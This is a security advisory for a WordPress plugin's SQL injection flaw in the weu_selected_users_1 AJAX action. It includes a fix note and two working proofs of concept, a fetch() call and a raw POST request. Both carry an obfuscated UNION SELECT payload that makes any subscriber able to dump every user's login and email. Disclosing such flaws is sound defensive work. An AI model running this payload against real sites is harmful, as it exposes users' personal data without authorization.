The plugin does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, which is available to any authenticated user, allowing them to perform SQL injection attacks.
As any authenticated user (such as a subscriber), the request below will display all users' email addresses.
// Proof of concept from the advisory above: a single POST to the plugin's
// admin-ajax action with an attacker-controlled data_raw[] value. Because the
// value is interpolated into the SQL query without escaping, the UNION SELECT
// in the parameter reaches the database; an ordinary authenticated session
// (credentials: "include") is all that is required.
// Server-side fix: bind data_raw values with $wpdb->prepare() (or cast them to
// int) instead of interpolating them, and restrict the action to the capability
// it actually needs rather than any logged-in user.
fetch("httsp://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action":"weu_selected_users_1","data_raw[]":"0 UNION SELECT concat(char(97),char(58),char(49),char(58),char(123),char(105),char(58),char(48),char(59),char(115),char(58),char(54),char(57),char(58),char(34),char(49),char(32),char(85),char(78),char(73),char(79),char(78),char(32),char(83),char(69),char(76),char(69),char(67),char(84),char(32),char(99),char(111),char(110),char(99),char(97),char(116),char(40),char(117),char(115),char(101),char(114),char(95),char(108),char(111),char(103),char(105),char(110),char(44),char(32),char(99),char(104),char(97),char(114),char(40),char(52),char(52),char(41),char(44),char(32),char(117),char(115),char(101),char(114),char(95),char(101),char(109),char(97),char(105),char(108),char(41),char(32),char(70),char(82),char(79),char(77),char(32),char(119),char(112),char(95),char(117),char(115),char(101),char(114),char(115),char(34),char(59),char(125))"}),
"method": "POST",
"credentials": "include"
})
.then(response => response.text())
.then(data => console.log(data));
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 1405
Connection: close
Cookie: [any authenticated user]
action=weu_selected_users_1&data_raw%5B%5D=0+UNION+SELECT+concat%28char%2897%29%2Cchar%2858%29%2Cchar%2849%29%2Cchar%2858%29%2Cchar%28123%29%2Cchar%28105%29%2Cchar%2858%29%2Cchar%2848%29%2Cchar%2859%29%2Cchar%28115%29%2Cchar%2858%29%2Cchar%2854%29%2Cchar%2857%29%2Cchar%2858%29%2Cchar%2834%29%2Cchar%2849%29%2Cchar%2832%29%2Cchar%2885%29%2Cchar%2878%29%2Cchar%2873%29%2Cchar%2879%29%2Cchar%2878%29%2Cchar%2832%29%2Cchar%2883%29%2Cchar%2869%29%2Cchar%2876%29%2Cchar%2869%29%2Cchar%2867%29%2Cchar%2884%29%2Cchar%2832%29%2Cchar%2899%29%2Cchar%28111%29%2Cchar%28110%29%2Cchar%2899%29%2Cchar%2897%29%2Cchar%28116%29%2Cchar%2840%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%2895%29%2Cchar%28108%29%2Cchar%28111%29%2Cchar%28103%29%2Cchar%28105%29%2Cchar%28110%29%2Cchar%2844%29%2Cchar%2832%29%2Cchar%2899%29%2Cchar%28104%29%2Cchar%2897%29%2Cchar%28114%29%2Cchar%2840%29%2Cchar%2852%29%2Cchar%2852%29%2Cchar%2841%29%2Cchar%2844%29%2Cchar%2832%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%2895%29%2Cchar%28101%29%2Cchar%28109%29%2Cchar%2897%29%2Cchar%28105%29%2Cchar%28108%29%2Cchar%2841%29%2Cchar%2832%29%2Cchar%2870%29%2Cchar%2882%29%2Cchar%2879%29%2Cchar%2877%29%2Cchar%2832%29%2Cchar%28119%29%2Cchar%28112%29%2Cchar%2895%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%28115%29%2Cchar%2834%29%2Cchar%2859%29%2Cchar%28125%29%29